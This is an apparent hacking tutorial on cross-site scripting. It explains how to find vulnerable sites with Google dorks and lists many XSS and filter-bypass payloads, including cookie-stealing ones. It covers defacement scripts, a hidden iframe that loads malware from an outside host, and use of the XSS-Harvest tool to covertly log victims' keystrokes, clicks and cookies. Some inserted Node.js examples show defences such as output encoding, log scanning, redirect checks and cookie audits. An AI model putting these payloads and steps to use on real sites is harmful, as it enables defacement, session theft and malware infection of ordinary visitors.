NOTE: Hacking is an illegal activity, so don't try this on anyone. This tutorial is only for educational purposes. If you want to use this tutorial for any other purpose, please stop reading.
XSS Cross Site Scripting
There are actually three types of Cross-Site Scripting, commonly
named as:
1. DOM-Based XSS
2. Non-persistent XSS
3. Persistent XSS
How to Find XSS Vulnerabilities:-
To start finding these vulnerabilities you can begin by checking blogs, forums, shoutboxes, comment boxes and search boxes; there are too many places to mention.
Using 'Google dorks' makes the finding easier. If you want to get cracking, go to google.com and type inurl:"search.php?q=". That is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities; it's just a matter of having a good eye and some good knowledge of how to bypass their filtering.
Basics of XSS:
Now let's start learning some actual methods. The most commonly used XSS injection is (just type):
<script>alert("DEV_D")</script>
This will alert a popup message saying DEV_D (without quotes). So, using "search.php?q=", you can simply try the following on a website:
http://website.com/search.php?q=<script>alert("DEV_D")</script>
There are good chances of it working, but don't be worried if it doesn't; just try different sites. You can insert HTML, not just JavaScript:
http://website.com/search.php?q=<br><br><b><u>DEV_D</u></b>
If you see the bold text on the page and the newlines, then you know it's vulnerable.
Deface a Website using XSS?
The first method uses IMG SRC. For those of you who don't know HTML, IMG SRC is a tag that displays the image linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
Now if you change the link to a valid picture link, save it and run it, you will see what I mean. Say you have found a shoutbox, comment box, or anything that shows your data after you submit it; you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed, as the page will already have them. It helps to make your picture big so it stands out and it's clear the site got hacked. Another method is using Flash videos; it works the same way as the image method but gives a more stylish deface.
<EMBED SRC="http://site.com/xss.swf">
That will execute the Flash video linked to it. Or maybe use a popup or redirection such as:
<script>window.open( "http://www.dev.com/" )</script>
There are many other ways that you can find using Google or other websites. My purpose is to make you understand the concept :)
How to Bypass Filtration?
A lot of sites may seem vulnerable but not execute the code; to solve this, read on. Some common methods to bypass filtering are
')alert('xss');
or
");alert('xss');
which will do the same thing as <script>alert("XSS")</script> on a vulnerable server. You can also try hex or base64 encoding your data before you submit. Please note it's bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS", so we use "DEV_D".
Some other ways to bypass filtering:
website.com/search.php?q="><script>alert(“DEV_D”)</script>
website.com/search.php?q="><script>alert(“DEV_D”);</script>
website.com/search.php?q="><script>alert(/DEV_D");</script>
website.com/search.php?q=//"><script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz<script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz"><script>alert(/DEV_D/);</script>
website.com/search.php?q=xyz"></script><script>alert(/DEV_D/);</script>
website.com/search.php?q=000"><script></script><script>alert(DEV_D);</script>
website.com/search.php?q=000xyz</script><script>alert(/DEV_D/);</script>
website.com/search.php?q=--<script>"></script>alert(/DEV_D/);</script>
website.com/search.php?q="><img src='javascript:alert('DEV_D);'>
website.com/search.php?q="><script src='http://virus.js'></script>
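The bypass list above works because a filter that inspects the raw query string misses encoded or obfuscated forms of the same payload. The following is an added example, not part of the original tutorial, showing the defender's side: a small Node.js scanner that URL-decodes each request in a web server access log (repeatedly, to catch double encoding) before matching a handful of XSS indicators. The log lines are constructed for the example, and the pattern names, `fullyDecode`, `parseLogLine`, `classifyRequest` and `analyzeLog` are this example's own.

```javascript
// Added example, not part of the original tutorial: scan Combined Log Format
// access-log lines for XSS probes. The request URL is URL-decoded until it
// stops changing, so a double-encoded payload (%253C -> %3C -> <) is matched
// in its final form, which is exactly what a filter looking at the raw
// query string misses.

// Constructed sample lines; the IPs, paths and payloads are made up for the example.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 512',
  '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22DEV_D%22)%3C/script%3E HTTP/1.1" 200 512',
  '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E HTTP/1.1" 200 512',
  '10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=%2522%253E%253Cscript%253E HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?x=alert(String.fromCharCode(72,79,67)) HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /page.php?next=javascript:alert(1) HTTP/1.1" 302 0',
];

// Indicator patterns (names are this example's own), checked in this order.
const XSS_PATTERNS = [
  { name: 'script-tag',     re: /<\s*\/?\s*script\b/i },
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'charcode',       re: /String\.fromCharCode\s*\(/i },
  { name: 'html-tag',       re: /<\s*(img|svg|iframe|body|embed|object|base)\b/i },
];

// Decode %xx sequences repeatedly (bounded) until the string is stable.
// A malformed sequence stops decoding and returns what we have so far.
function fullyDecode(s) {
  let current = s;
  for (let round = 0; round < 5; round++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return current;
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// Minimal Combined Log Format parser: client IP, timestamp, method, URL, status.
function parseLogLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], url: m[4], status: Number(m[5]) };
}

// Names of every indicator that matches the decoded URL.
function classifyRequest(url) {
  const decoded = fullyDecode(url);
  return XSS_PATTERNS.filter(p => p.re.test(decoded)).map(p => p.name);
}

// One finding per log line that matched at least one indicator.
function analyzeLog(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = parseLogLine(line);
    if (rec === null) continue;
    const hits = classifyRequest(rec.url);
    if (hits.length > 0) findings.push({ ip: rec.ip, time: rec.time, url: rec.url, hits });
  }
  return findings;
}

for (const f of analyzeLog(SAMPLE_LOG)) {
  console.log(`${f.time} ${f.ip} ${f.hits.join(',')} ${f.url}`);
}
```

Decoding before matching is the whole point: the fourth sample line carries `%2522%253E%253Cscript%253E`, which a single decode turns into `%22%3E%3Cscript%3E` and only a second decode reveals as `"><script>`. The bound of five rounds keeps a hostile input from making the scanner loop.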
Advanced XSS - way to bypass magic quotes filtration:
Now we are going to learn some good techniques. I have come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless. Fear not, I have come up with a way using char codes (decimals), converting char codes to ASCII. For the functions that turn char codes (decimals) into ASCII, you can find a complete table here:
http://www.asciitable.com/
http://easycalculation.com/
This will help you write what you want. In my examples I'll be writing "HOC"; this is the corresponding code:
72 79 67
Now we've got the decimal values of our string; we need to know which function in JavaScript converts this.
String.fromCharCode()
is suitable for this kind of thing. It's easy to set up; I'm going to give it my arguments below.
String.fromCharCode(72, 79, 67)
Now "String.fromCharCode(72, 79, 67)" is the JavaScript (ASCII) way of saying "HOC". To use this with alerts etc., you don't need quotes, as it acts like a variable.
<script>alert(String.fromCharCode(72,79,67))</script>
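The point of the char-code trick is that escaping quotes (PHP magic quotes) is not an XSS defence, because a payload that contains no quotes is left untouched; what actually stops the search.php?q= injections from the Basics section is encoding the reflected value for the HTML context it lands in. The following Node.js example is added here and is not from the original tutorial: it renders the q parameter with three different treatments and checks which of them keeps the page's structure intact. `renderSearchPage`, `reflectionBreaksPage`, `compareEncoders` and the encoder names are this example's own.

```javascript
// Added example, not part of the original tutorial. It models a server that
// reflects the "q" parameter of search.php in two HTML contexts (the value
// attribute of the search box and a paragraph of text) and compares three
// ways of treating q before reflecting it.

const encoders = {
  // 1. Vulnerable: q is reflected verbatim, the pattern the tutorial's
  //    search.php?q=<script>... injection depends on.
  none: q => q,
  // 2. Emulation of PHP "magic quotes": backslash-escape quotes and
  //    backslashes. This breaks alert("DEV_D") but leaves a payload that
  //    contains no quotes, such as alert(String.fromCharCode(72,79,67)),
  //    completely intact.
  magicQuotes: q => q.replace(/([\\'"])/g, '\\$1'),
  // 3. HTML entity encoding: every character that can open or close a tag
  //    or terminate an attribute value becomes an entity, so the browser
  //    renders q as text in both contexts.
  htmlEscape: q => q.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' })[c]),
};

function renderSearchPage(q, encode) {
  const reflected = encode(q);
  return [
    '<form action="/search.php">',
    `<input name="q" value="${reflected}">`,   // attribute context
    '</form>',
    `<p>Results for: ${reflected}</p>`,         // text context
  ].join('\n');
}

// True when the reflected value changed the page's structure: the value
// attribute no longer ends where the template put its closing quote, or the
// text context contains a raw "<" that can start a tag.
function reflectionBreaksPage(html) {
  const attr = /<input name="q" value="([^"]*)">/.exec(html);
  const text = /<p>Results for: ([\s\S]*)<\/p>$/.exec(html);
  if (attr === null || text === null) return true;
  return text[1].includes('<');
}

// For each encoder, one boolean per payload: does the page break?
function compareEncoders(payloads) {
  const table = {};
  for (const [name, encode] of Object.entries(encoders)) {
    table[name] = payloads.map(p => reflectionBreaksPage(renderSearchPage(p, encode)));
  }
  return table;
}

const PAYLOADS = [
  '<script>alert("DEV_D")</script>',                        // quoted payload
  '<script>alert(String.fromCharCode(72,79,67))</script>',   // quote-free payload
  '"><script>alert(1)</script>',                             // attribute breakout
  'shoes',                                                   // ordinary search
];
console.table(compareEncoders(PAYLOADS));
```

The table shows the two halves of the argument: `magicQuotes` breaks the page on all three payloads just as `none` does (the quoted one is damaged, but the tags are still there and the char-code one is untouched), while `htmlEscape` keeps the page intact for all four inputs because the checker never sees a raw `"` in the attribute or a raw `<` in the text.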
New XSS Payloads
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<base href="javascript:\"><a href="//%0aalert(/1/);//">link</a>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Nice CSP & WAF bypass: <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<svg </onload ="1> (_=alert,_(DEV)) "">
<img onerror=alert(1) src
<u></u>
Advanced scripts to find XSS vulnerabilities in websites. Just copy any script and try.
To redirect, exploit code:
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
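The redirecturl payload relies on a redirect parameter that is assigned to the location without checking its scheme, which is how a javascript: URL (or the data: URLs used by other payloads in this list) ends up executing. The following is an added example, not from the original tutorial, of the check a site should apply before honouring a user-supplied redirect target; it uses the WHATWG URL parser built into Node.js, and `safeRedirectTarget`, `checkAll` and the origin https://www.example.test are this example's own assumptions.

```javascript
// Added example, not part of the original tutorial. safeRedirectTarget() is
// the check a site should apply to a user-supplied redirect parameter
// before assigning it to window.location: the target must parse as http(s)
// and resolve to the site's own origin. SITE_ORIGIN is an assumed value.

const SITE_ORIGIN = 'https://www.example.test';

// Returns the normalised URL to redirect to, or null if the target must be
// refused. Uses the WHATWG URL parser that ships with Node.js (and browsers),
// so scheme case, leading whitespace and backslash-for-slash quirks are
// handled by the same rules a browser applies.
function safeRedirectTarget(raw, siteOrigin = SITE_ORIGIN) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) return null;
  let url;
  try {
    // Relative paths such as /account resolve against the site; absolute URLs keep their own origin.
    url = new URL(raw.trim(), siteOrigin);
  } catch (e) {
    return null;                                   // not a URL at all
  }
  // javascript:, data:, vbscript: and friends never qualify, whatever their case.
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  // //evil.test, /\evil.test and https://www.example.test.evil.test all fail here.
  if (url.origin !== new URL(siteOrigin).origin) return null;
  return url.href;
}

// Constructed inputs covering the cases the payload list relies on.
const REDIRECT_CASES = [
  '/account?tab=1',
  'https://www.example.test/login',
  'javascript:alert("XSS")',
  ' JaVaScRiPt:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  '//evil.test/',
  '/\\evil.test/',
  'https://www.example.test.evil.test/',
];

function checkAll(cases) {
  return cases.map(c => ({ input: c, allowed: safeRedirectTarget(c) }));
}
console.table(checkAll(REDIRECT_CASES));
```

Letting the URL parser do the work matters more than it looks: a hand-written check such as "starts with /" accepts `//evil.test/` and `/\evil.test/`, both of which the parser resolves to a foreign host, and a lowercase comparison against `javascript:` misses the mixed-case and whitespace-prefixed forms that the parser normalises before `protocol` is read.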
Now for XSS. Example: www.xyz.com?q="XSS Script"
• "/>alert("Xss:DEV_D")
• "/></script><script>alert(/XSS: DEV_D/)</script>
<body onload=alert(1)>
"<body onload="alert('XSS by DEV_D)">
"><%2Fstyle<%2Fscript><script>confirm("XSS By DEV_D")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
• http://test.com<script>alert(document.domain)</script>
• http://test.com<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/)
"><iframe src='javascript:prompt(/XSS/);'>
<iframe src="http://google.com"></iframe>
"><iframe src=a onload=alert('XSS')<
</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>
DOM Based XSS Scripts
/default.aspx#"><img src=x onerror=prompt('XSS');>
/default.aspx#"><img src=x onerror=prompt('0');>
<img src=x onerror=prompt(1);> by ">
"><img src=x onerror=prompt(0)>.txt.jpg
"><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
Script for changing the background color of a website:
<script>document.body.bgColor="red";</script>
Use this on your target website as:
http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>
Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg/";</script>
Defacement Page with Pastehtml:
First of all, upload a defacement page (HTML) to pastehtml.com and get the link. When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent-XSS-vulnerable sites.
Defacing with iframe Injection
What is an IFrame Injection?
Using the IFrame tag, the attacker injects links to malware-hosting websites into popular websites through cross-site scripting. So when the usual visitors of those popular sites open the website, it redirects them to the malware-hosting website. Malware is loaded onto your computer, and now you are infected.
What can an attacker do with Iframe Injection?
Using iframe injection, an attacker can inject advertisements inside other websites, insert links to malware-infected sites, redirect to malware-infected sites, and more.
Iframe Injection Tutorial:
1. First of all, the attacker finds vulnerable websites using Google dorks.
2. They test the vulnerability by inserting an iframe tag through the URL.
3. Then they insert the malicious iframe code inside the webpage.
For example, he can insert this code using the URL:
Code:
<iframe src="http://malwarewebpages/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
For PHP webpages:
echo "<iframe src=\"http://malwarewebpages/web.html\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
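A site owner cleaning up after this kind of injection needs a way to find the injected frames, which are typically 1x1, styled invisible, and point off-site. The following Node.js scanner is an added example, not from the original tutorial: it pulls every iframe start tag out of an HTML document, checks its size and style for signs of hiding, and checks whether its src leaves the site's own host. The sample pages, the host www.example.test and the function names (`parseAttributes`, `isHidden`, `isOffSite`, `findSuspiciousIframes`) are constructed for the example.

```javascript
// Added example, not part of the original tutorial: find injected frames of
// the kind shown above in an HTML document. A frame is reported when it is
// hidden (1x1 or smaller, visibility:hidden, display:none) or when its src
// points away from the site's own host. OWN_HOST and the sample pages are
// constructed for the example.

const OWN_HOST = 'www.example.test';

const SAMPLE_PAGES = {
  clean: '<html><body><p>Hello</p>'
    + '<iframe src="https://www.example.test/widget" width="300" height="200"></iframe></body></html>',
  injected: '<html><body><p>Hello</p>'
    + '<iframe src="http://malwarewebpages.test/web.html" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body></html>',
  displayNone: '<html><body><iframe style="display: none" src="//tracker.test/x.html"></iframe></body></html>',
};

// Attribute parser for a single start tag: handles double-quoted,
// single-quoted and unquoted values (width=1 in the injected sample).
function parseAttributes(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return attrs;
}

// Hidden by size (either dimension 1 or less) or by inline style.
function isHidden(attrs) {
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  const tiny = (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1);
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return tiny || /visibility:hidden|display:none/.test(style);
}

// Resolve src against the site so protocol-relative URLs (//tracker.test/...) are judged correctly.
function isOffSite(src, ownHost) {
  if (!src) return false;
  try {
    return new URL(src, 'https://' + ownHost + '/').host !== ownHost;
  } catch (e) {
    return true;                                   // unparsable src: treat as suspicious
  }
}

// Scans every <iframe ...> start tag. Regex extraction is enough for the
// injection style shown; a ">" inside an attribute value would need a real parser.
function findSuspiciousIframes(html, ownHost = OWN_HOST) {
  const findings = [];
  const re = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttributes(m[0]);
    const hidden = isHidden(attrs);
    const offSite = isOffSite(attrs.src, ownHost);
    if (hidden || offSite) findings.push({ src: attrs.src || '', hidden, offSite });
  }
  return findings;
}

for (const [name, html] of Object.entries(SAMPLE_PAGES)) {
  console.log(name, findSuspiciousIframes(html));
}
```

Run it over the HTML the server actually sends (fetch the page, not the file on disk), since the PHP form of the injection above generates the frame at request time and never appears in a static template.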
I have just given some easy methods to deface an XSS-affected page.
XSS-Harvest:- Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies
Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affected domain, regardless of whether or not the vulnerability is "reflected" or "persistent". XSS-Harvest is a multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.
Functionality of xss-harvest:
* The infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
* Any key entered will be sent covertly to the server.
* Any mouse click performed will be analysed and the data covertly sent to the server.
* Optionally 'redress' the vulnerable page to display a different page on the same subdomain, e.g. a login form.
* If redressing the victim's browser, allow subsequently loaded pages to also be 'infected', assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
* Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
* Each victim has a separate history file containing all events, cookies and keystrokes.
* The server console displays real-time data received (due to the multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
* Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
* Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.
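The cookies XSS-Harvest collects are the ones script can read through document.cookie; the "protected by scope" case the text mentions is the HttpOnly attribute, with Secure and SameSite limiting where the cookie is sent at all. The following Node.js audit is an added example, not part of XSS-Harvest or the original tutorial: it parses a Set-Cookie header value and reports which of those attributes are missing. The sample headers and the function names (`parseSetCookie`, `auditSetCookie`, `auditAll`) are this example's own.

```javascript
// Added example, not part of XSS-Harvest or the original tutorial: audit
// Set-Cookie headers for the attributes that limit what injected script can
// do with a session cookie. HttpOnly keeps the cookie out of document.cookie,
// Secure keeps it off plain HTTP, and SameSite keeps it off cross-site
// requests. Sample headers are constructed for the example.

const SAMPLE_SET_COOKIE = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'pref=dark; Secure; SameSite=None',
];

// Split one Set-Cookie header value into name, value and a map of
// lower-cased attribute names (flag attributes map to true).
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim()).filter(p => p.length > 0);
  if (parts.length === 0) return null;
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: eq === -1 ? parts[0] : parts[0].slice(0, eq),
    value: eq === -1 ? '' : parts[0].slice(eq + 1),
    attrs: {},
  };
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return cookie;
}

// Returns the findings for one header; an empty list means the cookie
// carries all three protections.
function auditSetCookie(header) {
  const cookie = parseSetCookie(header);
  if (cookie === null) return { name: '', issues: ['empty Set-Cookie header'] };
  const issues = [];
  if (!('httponly' in cookie.attrs)) issues.push('missing HttpOnly: readable via document.cookie by injected script');
  if (!('secure' in cookie.attrs)) issues.push('missing Secure: sent over plain HTTP');
  const sameSite = typeof cookie.attrs.samesite === 'string' ? cookie.attrs.samesite.toLowerCase() : '';
  if (sameSite === '' || sameSite === 'none') issues.push('SameSite missing or None: sent on cross-site requests');
  return { name: cookie.name, issues };
}

function auditAll(headers) {
  return headers.map(auditSetCookie);
}

for (const r of auditAll(SAMPLE_SET_COOKIE)) {
  console.log(r.name, r.issues.length === 0 ? 'ok' : r.issues.join('; '));
}
```

HttpOnly only removes the cookie from what the injected script can read; keystrokes, clicks and the redressed login form in the feature list above are unaffected by it, so the audit is one layer, not a substitute for fixing the injection.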
How to Exploit XSS with XSS-Harvest?
Identify a page vulnerable to XSS (reflected or persistent will be fine, unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags into the source of the vulnerable page. Most attackers will insert something like '<script>alert(1)</script>' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (the default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:
<script src=">
This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in; a new history file will be created for each new victim.
To use the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Basic dependencies: HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork
Legal Disclaimer: This tutorial is completely for educational purposes only. The author will not be held responsible for any misuse of this tutorial by any means.